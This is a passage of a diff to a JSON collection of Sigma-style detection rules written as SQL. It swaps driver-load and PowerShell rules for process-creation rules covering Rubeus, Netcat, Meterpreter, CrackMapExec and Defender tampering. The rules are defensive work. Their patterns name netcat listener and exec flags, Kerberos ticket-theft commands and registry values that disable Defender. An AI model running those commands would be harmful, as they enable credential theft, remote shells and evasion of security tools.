'%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unlikely" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.collection", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "status": "test", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' 